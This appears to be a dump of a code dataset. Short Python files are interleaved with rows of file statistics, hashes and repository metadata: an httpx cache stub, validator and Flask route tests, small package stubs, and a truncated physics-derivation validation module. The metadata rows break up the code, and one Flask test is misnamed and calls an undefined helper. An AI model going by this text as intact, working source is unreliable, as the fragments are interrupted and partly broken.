async def adelete(self, request: httpx.Request) -> None:
"""(Async) Delete an entry from cache.
Args:
request: httpx.Request
"""
def close(self) -> None:
"""Close cache."""
async def aclose(self) -> None:
"""(Async) Close cache."""
| 26.326316
| 84
| 0.580568
| 278
| 2,501
| 5.215827
| 0.205036
| 0.115862
| 0.157241
| 0.095172
| 0.834483
| 0.797241
| 0.797241
| 0.797241
| 0.733793
| 0.671724
| 0
| 0
| 0.328269
| 2,501
| 94
| 85
| 26.606383
| 0.863095
| 0.237905
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.1
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
226801c939ef67ceb3068ea5a2e555afc9eb516c
| 26
|
py
|
Python
|
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | 1
|
2018-11-15T16:23:05.000Z
|
2018-11-15T16:23:05.000Z
|
"""2019-05-28 10:50:36"""
| 13
| 25
| 0.538462
| 6
| 26
| 2.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.583333
| 0.076923
| 26
| 1
| 26
| 26
| 0
| 0.730769
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
97ec13aa7ab2fd0f155e64b9bb056deceb22f82e
| 2,588
|
py
|
Python
|
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
from pyfuzzy_toolbox import wm
import numpy as np
from nose.tools import raises
@raises(TypeError)
def test_generate_regions_right_range_type():
regions = wm.generate_regions(range(0, 1), 5)
@raises(TypeError)
def test_generate_regions_right_N_type():
regions = wm.generate_regions(np.arange(0, 1.01, 0.01), 2.5)
def test_generate_regions_right_numbet_of_regions_for_N_0():
N = 0
_range = np.arange(0, 1.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 1
assert regions[0].params == [0, 0.5, 1]
assert (regions[0].range == _range).all()
def test_generate_regions_right_numbet_of_regions_for_N_1():
N = 1
_range = np.arange(0, 1.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 3
assert regions[1].params == [0, 0.5, 1]
assert regions[0].params == [0, 0, 0.5]
assert regions[2].params == [0.5, 1, 1]
def test_generate_regions_right_numbet_of_regions_for_N_1_and_negative_range():
N = 1
_range = np.linspace(-1, 1, num=101)
regions = wm.generate_regions(_range, N)
assert len(regions) == 3
assert (regions[1].params[1] - regions[1].params[0]
) == (regions[1].params[2] - regions[1].params[1])
def test_generate_regions_right_numbet_of_regions_for_N_2():
N = 2
_range = np.arange(0, 15.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 5
assert (regions[0].params[2] - regions[0].params[0]
) == (regions[2].params[2] - regions[2].params[1])
assert (regions[1].params[2] - regions[1].params[0]
) == (regions[2].params[2] - regions[2].params[0])
assert (regions[2].params[2] - regions[2].params[0]
) == (regions[3].params[2] - regions[3].params[0])
assert (regions[4].params[2] - regions[4].params[0]
) == (regions[3].params[2] - regions[3].params[1])
def test_generate_regions_right_numbet_of_regions_for_N_2_and_negative_range():
N = 2
_range = np.linspace(-9, 0, num=101)
regions = wm.generate_regions(_range, N)
assert len(regions) == 5
assert (regions[0].params[2] - regions[0].params[0]
) == (regions[2].params[2] - regions[2].params[1])
assert (regions[1].params[2] - regions[1].params[0]
) == (regions[2].params[2] - regions[2].params[0])
assert (regions[2].params[2] - regions[2].params[0]
) == (regions[3].params[2] - regions[3].params[0])
assert (regions[4].params[2] - regions[4].params[0]
) == (regions[3].params[2] - regions[3].params[1])
| 35.944444
| 79
| 0.638717
| 403
| 2,588
| 3.903226
| 0.104218
| 0.075652
| 0.151303
| 0.097902
| 0.867133
| 0.818818
| 0.818818
| 0.726637
| 0.699936
| 0.699936
| 0
| 0.072588
| 0.190881
| 2,588
| 71
| 80
| 36.450704
| 0.678606
| 0
| 0
| 0.578947
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.122807
| false
| 0
| 0.052632
| 0
| 0.175439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
97ef354cb00695fca6fd3a0fc54aba0e38c9eb12
| 19
|
py
|
Python
|
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
from . import line
| 9.5
| 18
| 0.736842
| 3
| 19
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3f15dd8a120396cbf6ec20295b8585d057ec0f30
| 148
|
py
|
Python
|
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | 2
|
2015-01-15T09:10:57.000Z
|
2015-01-15T09:55:10.000Z
|
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | null | null | null |
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from .projects.models import *
from .users.models import *
from .issues.models import *
from .pullrequests.models import *
| 21.142857
| 34
| 0.709459
| 19
| 148
| 5.526316
| 0.526316
| 0.457143
| 0.457143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.148649
| 148
| 6
| 35
| 24.666667
| 0.825397
| 0.141892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
3f2764bb5f87b8685f3562c1f90b5a820c979b3d
| 3,046
|
py
|
Python
|
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | null | null | null |
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | 3
|
2018-10-10T08:19:07.000Z
|
2018-10-29T11:43:08.000Z
|
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | 1
|
2021-04-11T08:04:22.000Z
|
2021-04-11T08:04:22.000Z
|
import unittest
from unittest.mock import Mock
from wtforms.validators import ValidationError
from app.validation.error_messages import error_messages
from app.validation.validators import MonthYearCheck
class TestMonthYearValidator(unittest.TestCase):
def test_month_year_date_validator_none(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = None
mock_form.year.data = None
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_empty_string(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = ''
mock_form.year.data = ''
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_missing_month(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = ''
mock_form.year.data = '2017'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_missing_year(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '12'
mock_form.year.data = ''
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_invalid_month(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '13'
mock_form.year.data = '2017'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_invalid_year(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '12'
mock_form.year.data = '17'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_valid(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '01'
mock_form.year.data = '2017'
mock_field = Mock()
try:
validator(mock_form, mock_field)
except ValidationError:
self.fail('Valid date raised ValidationError')
| 28.203704
| 76
| 0.662837
| 347
| 3,046
| 5.541787
| 0.135447
| 0.116485
| 0.087363
| 0.058242
| 0.826833
| 0.813313
| 0.798232
| 0.798232
| 0.781071
| 0.781071
| 0
| 0.009578
| 0.245896
| 3,046
| 107
| 77
| 28.46729
| 0.827601
| 0
| 0
| 0.7
| 0
| 0
| 0.041694
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 1
| 0.1
| false
| 0
| 0.071429
| 0
| 0.185714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f7364c93368e0f43aae71f4af38d5cbbfe48831
| 11,309
|
py
|
Python
|
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | null | null | null |
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | 2
|
2021-03-09T19:47:01.000Z
|
2022-02-10T19:41:33.000Z
|
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | null | null | null |
import unittest
from flask import request
from datetime import date, datetime
from app import db
from app.parks_db import Exhibition
from base import BaseTests
def format_date(date_text):
if not date_text:
return None
for style in ('%Y-%m-%d', '%m.%d.%Y', '%m.%d.%y', '%m/%d/%Y', '%m/%d/%y'):
try:
# Determine style of date string
date = datetime.strptime(str(date_text), style)
# Return date object
return date
except ValueError:
pass
raise ValueError('Can\'t determine date format of {}!'.format(date_text))
class TestRoutesExhibition(BaseTests):
default_exhibition = dict(
name='Swanky Exhibition',
start_date=format_date('2019-01-01'),
end_date=format_date('2019-06-01'),
opening=format_date('2019-01-01'),
comments='',
install_start=format_date('2018-12-28'),
install_end=format_date('2019-01-01'),
prm='',
approval='',
walkthrough='',
cb_presentation='',
license_mailed='',
license_signed='',
license_borough='',
bond='',
coi='',
coi_renewal='',
signage_submit='',
signage_received='',
press_draft='',
press_approved='',
web_text='',
work_images='',
deinstall_date=format_date('2019-06-05'),
deinstall_check='',
bond_return='',
press_clippings=''
)
default_exhibition_string = dict(
name='Swanky Exhibition',
start_date='2019-01-01',
end_date='2019-06-01',
opening='2019-01-01',
comments='',
install_start='2018-12-28',
install_end='2019-01-01',
prm='',
approval='',
walkthrough='',
cb_presentation='',
license_mailed='',
license_signed='',
license_borough='',
bond='',
coi='',
coi_renewal='',
signage_submit='',
signage_received='',
press_draft='',
press_approved='',
web_text='',
work_images='',
deinstall_date='2019-06-05',
deinstall_check='',
bond_return='',
press_clippings=''
)
@staticmethod
def create_exhibition(**kwargs):
"""
Static method to add exhibition class object to database
Takes the following string args: name, start_date, end_date, opening, comments, install_start, install_end, prm, approval, walkthrough, cb_presentation, license_mailed, license_signed, license_borough, bond, coi, coi_renewal, signage_submit, signage_received, press_draft, press_approved, web_text, work_images, deinstall_date, deinstall_check, bond_return, press_clippings
Adds class to exhibition database, commits session, and flushes to get id val
Returns the created class instance
"""
exhibition = Exhibition(**kwargs)
db.session.add(exhibition)
db.session.commit()
db.session.flush()
return exhibition
# Test exhibitions page logged in
def test_valid_exhibitions_logged_in(self):
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions', req)
self.assertEqual(response.status_code, 200)
# Test exhibitions page not logged in
def test_invalid_exhibitions_not_logged_in(self):
with self.app:
response = self.app.get('/exhibitions', follow_redirects=True)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page logged in
def test_valid_exhibition_logged_in(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions/1', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions/1', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page not logged in
def test_invalid_exhibition_not_logged_in(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app:
response = self.app.get('/orgs/1', follow_redirects=True)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page with no exhibitions
def test_invalid_exhibition_no_exhibitions(self):
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions/1', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions/1', req)
self.assertEqual(response.status_code, 404)
# Test GET exhibition CREATE page
def test_invalid_exhibition_create_get(self):
with self.app:
response = self.app.get('/exhibitions/create', follow_redirects=True)
self.assertIn('Method Not Allowed', response.data)
self.assertEqual(response.status_code, 405)
# Test exhibition CREATE page logged in
def test_valid_exhibition_create_post(self):
exhibition = self.default_exhibition_string
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/create',
data=exhibition,
follow_redirects=True
)
self.assertIn('"success": true', response.data)
self.assertEqual(response.status_code, 200)
# Test exhibition CREATE page not logged in
def test_invalid_exhibition_create_post(self):
exhibition = self.default_exhibition_string
with self.app as c:
response = self.app.post(
'/exhibitions/create',
data=exhibition,
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test POST exhibition EDIT page logged in
def test_valid_exhibition_edit_post(self):
exhibition = self.default_exhibition
new_exhibition = 'Swankier Exhibition'
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/1/edit',
data=dict(
name=new_exhibition,
start_date=self.default_exhibition_string['start_date'],
end_date=self.default_exhibition_string['end_date'],
opening=self.default_exhibition_string['opening'],
comments=exhibition['comments'],
install_start=self.default_exhibition_string['install_start'],
install_end=self.default_exhibition_string['install_end'],
prm=exhibition['prm'],
approval=exhibition['approval'],
walkthrough=exhibition['walkthrough'],
cb_presentation=exhibition['cb_presentation'],
license_mailed=exhibition['license_mailed'],
license_signed=exhibition['license_signed'],
license_borough=exhibition['license_borough'],
bond=exhibition['bond'],
coi=exhibition['coi'],
coi_renewal=exhibition['coi_renewal'],
signage_submit=exhibition['signage_submit'],
signage_received=exhibition['signage_received'],
press_draft=exhibition['press_draft'],
press_approved=exhibition['press_approved'],
web_text=exhibition['web_text'],
work_images=exhibition['work_images'],
deinstall_date=self.default_exhibition_string['deinstall_date'],
deinstall_check=exhibition['deinstall_check'],
bond_return=exhibition['bond_return'],
press_clippings=exhibition['press_clippings']
),
follow_redirects=True
)
self.assertIn('"success": true', response.data)
self.assertIn(new_exhibition, response.data)
self.assertEqual(response.status_code, 200)
# Test POST exhibition EDIT page not logged in
def tesit_invalid_exhbition_edit_post(self):
exhibition = self.default_exhibition_string
# Add exhibition to database
self.create_exhbition(**exhibition)
new_exhibition = 'Swankier Exhibition'
with self.app as c:
response = self.app.post(
'/exhibitions/1/edit',
data=dict(
name=new_exhibition,
start_date=self.default_exhibition_string['start_date'],
end_date=self.default_exhibition_string['end_date'],
opening=self.default_exhibition_string['opening'],
comments=exhibition['comments'],
install_start=self.default_exhibition_string['install_start'],
install_end=self.default_exhibition_string['install_end'],
prm=exhibition['prm'],
approval=exhibition['approval'],
walkthrough=exhibition['walkthrough'],
cb_presentation=exhibition['cb_presentation'],
license_mailed=exhibition['license_mailed'],
license_signed=exhibition['license_signed'],
license_borough=exhibition['license_borough'],
bond=exhibition['bond'],
coi=exhibition['coi'],
coi_renewal=exhibition['coi_renewal'],
signage_submit=exhibition['signage_submit'],
signage_received=exhibition['signage_received'],
press_draft=exhibition['press_draft'],
press_approved=exhibition['press_approved'],
web_text=exhibition['web_text'],
work_images=exhibition['work_images'],
deinstall_date=self.default_exhibition_string['deinstall_date'],
deinstall_check=exhibition['deinstall_check'],
bond_return=exhibition['bond_return'],
press_clippings=exhibition['press_clippings']
),
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition DELETE page logged in
def test_valid_exhibition_delete_post(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/1/delete',
follow_redirects=True
)
req = request.url
retry = self.app.get(
'/exhibitions/1',
follow_redirects=True
)
self.assertIn('/exhibitions', req)
self.assertEqual(response.status_code, 200)
self.assertEqual(retry.status_code, 404)
# Test exhibition DELETE page not logged in
def test_invalid_exhibition_delete_post(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
response = self.app.post(
'/exhibitions/1/delete',
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
| 31.589385
| 377
| 0.653285
| 1,280
| 11,309
| 5.555469
| 0.114844
| 0.02461
| 0.059063
| 0.056954
| 0.844466
| 0.809731
| 0.772184
| 0.731121
| 0.697792
| 0.681058
| 0
| 0.016746
| 0.234327
| 11,309
| 358
| 378
| 31.589385
| 0.804481
| 0.106906
| 0
| 0.736059
| 0
| 0
| 0.116173
| 0.004177
| 0
| 0
| 0
| 0
| 0.096654
| 1
| 0.052045
| false
| 0.003717
| 0.022305
| 0
| 0.096654
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
451a23badf4d19e5fabba0be2d632d17fe497571
| 147
|
py
|
Python
|
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | 2
|
2020-09-05T13:12:44.000Z
|
2020-10-12T16:51:16.000Z
|
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | null | null | null |
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | 1
|
2019-11-25T15:34:33.000Z
|
2019-11-25T15:34:33.000Z
|
"""Base Class for Knowledge Base Query"""
class KBquery:
def __init__(self):
pass
def query(self, constrains):
return []
| 16.333333
| 41
| 0.605442
| 17
| 147
| 5
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 147
| 9
| 42
| 16.333333
| 0.809524
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.2
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
451cb47d1fe9f92d3a2dbbf39cd8ae2b191621d3
| 109
|
py
|
Python
|
vyked/protocol_factory.py
|
shivank-gupta/vyked
|
98836b3230775c5ad52dfc72291b2958d3a244c9
|
[
"MIT"
] | 57
|
2015-02-28T07:42:45.000Z
|
2021-11-13T08:41:06.000Z
|
vyked/protocol_factory.py
|
niks660097/async_framework
|
57591d167bee365d5aa9bb5446b952095506e040
|
[
"MIT"
] | 106
|
2015-05-27T05:34:06.000Z
|
2021-04-21T04:34:42.000Z
|
vyked/protocol_factory.py
|
nerandell/vyked
|
7b2554454a50110e15928db7105e074a9e521517
|
[
"MIT"
] | 22
|
2015-05-27T05:08:15.000Z
|
2018-09-18T12:08:25.000Z
|
from .jsonprotocol import VykedProtocol
def get_vyked_protocol(handler):
return VykedProtocol(handler)
| 18.166667
| 39
| 0.816514
| 12
| 109
| 7.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12844
| 109
| 5
| 40
| 21.8
| 0.915789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
453e63a876bca43571fa442690cc6881535530f5
| 78,539
|
py
|
Python
|
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
# Physics Derivation Graph
# Ben Payne, 2020
# https://creativecommons.org/licenses/by/4.0/
# Attribution 4.0 International (CC BY 4.0)
import sympy # type: ignore
# the following is only relevant for doctests
from sympy.parsing.latex import parse_latex # type: ignore
import common_lib as clib
from typing import Tuple # , TextIO
import logging
import random
import re
import latex_to_sympy
logger = logging.getLogger(__name__)
# many of the validation functions are from
# https://github.com/allofphysicsgraph/proofofconcept/blob/gh-pages/v2_XML/databases/inference_rules_database.xml
# https://pymotw.com/3/doctest/
# how to use doctest for the entire file:
# python -m doctest -v validate_inference_rules_sympy.py
# testing per function on the command line:
# import doctest
# from validate_inference_rules_sympy import *
# doctest.run_docstring_examples(split_expr_into_lhs_rhs, globals(), verbose=True)
# I wasn't able to get the following to work:
# from doctest import testmod
# from validate_inference_rules_sympy import *
# testmod(name ='split_expr_into_lhs_rhs', verbose = True)
def validate_step(deriv_id: str, step_id: str, path_to_db: str) -> str:
    """
    Validate a single derivation step by dispatching to the SymPy-based
    checker for the step's inference rule.

    Args:
        deriv_id: key into dat["derivations"]
        step_id: key into dat["derivations"][deriv_id]["steps"]
        path_to_db: path passed to clib.read_db

    The possible return strings from this function include:
    * "no validation is available..." (e.g., for declarations)
    * "no check performed" (the check is not implemented yet)
    * "valid"
    * "diff is ..."

    Raises:
        Exception: when an expression in the step has no AST, or the
                   step's inference rule is not recognized.

    >>> validate_step('4924823', '2500423', 'data.json')
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug("step ID = " + step_id)
    # return "no check performed for improved latency"
    dat = clib.read_db(path_to_db)
    step_dict = dat["derivations"][deriv_id]["steps"][step_id]
    # logger.debug("validate_step; step_dict = %s", step_dict)

    # declarations and assumptions have nothing to check symbolically
    if step_dict["inf rule"] in [
        "declare initial expr",
        "declare final expr",
        "declare identity",
        "declare guess solution",
        "declare assumption",
    ]:
        logger.info("[trace end " + trace_id + "]")
        return "no validation is available for declarations"
    if step_dict["inf rule"] in [
        "assume N dimensions",
        "normalization condition",
        "boundary condition",
        "boundary condition for expr",
    ]:
        logger.info("[trace end " + trace_id + "]")
        return "no validation is available for assumptions"

    # latex_dict maps "input"/"feed"/"output" to {index: expr} where each
    # input/output entry is {"LHS": ..., "RHS": ...} and each feed entry
    # is a bare sympy expression.
    latex_dict: dict = {"input": {}, "feed": {}, "output": {}}
    for connection_type in ["inputs", "outputs"]:
        indx = 0
        for expr_local_id in step_dict[connection_type]:
            expr_global_id = dat["expr local to global"][expr_local_id]
            ast_str = dat["expressions"][expr_global_id]["AST"]
            logger.debug(
                step_id + " " + expr_local_id + " " + expr_global_id + " is " + ast_str
            )
            if len(ast_str) > 0:
                expr = latex_to_sympy.get_sympy_expr_from_AST_str(ast_str)
                # "inputs"[:-1] == "input"; "outputs"[:-1] == "output"
                latex_dict[connection_type[:-1]][indx] = {
                    "LHS": expr.lhs,
                    "RHS": expr.rhs,
                }
                indx += 1
            else:
                raise Exception(
                    "missing AST for expr "
                    + expr_global_id
                    + ", aka "
                    + expr_local_id
                    + " in step "
                    + step_id
                )
    indx = 0
    for expr_local_id in step_dict["feeds"]:
        expr_global_id = dat["expr local to global"][expr_local_id]
        ast_str = dat["expressions"][expr_global_id]["AST"]
        if len(ast_str) > 0:
            latex_dict["feed"][indx] = latex_to_sympy.get_sympy_expr_from_AST_str(
                ast_str
            )
            indx += 1
        else:
            raise Exception(
                "missing AST for expr "
                + expr_global_id
                + ", aka "
                + expr_local_id
                + " in step "
                + step_id
            )
    logger.debug("step_id = " + step_id)
    logger.debug(str(latex_dict))
    logger.debug(step_dict["inf rule"])

    # Dispatch table replacing the previous ~80-branch if/elif chain.
    # NOTE: the old chain contained a second, unreachable branch for
    # "LHS of expr 1 equals LHS of expr 2" (LHS_of_expr_equals_LHS_of_expr);
    # only the first mapping below was ever reachable, so it is kept.
    validators = {
        "add X to both sides": add_X_to_both_sides,
        "subtract X from both sides": subtract_X_from_both_sides,
        "multiply both sides by": multiply_both_sides_by,
        "divide both sides by": divide_both_sides_by,
        "change variable X to Y": change_variable_X_to_Y,
        "add zero to LHS": add_zero_to_LHS,
        "add zero to RHS": add_zero_to_RHS,
        "multiply LHS by unity": multiply_LHS_by_unity,
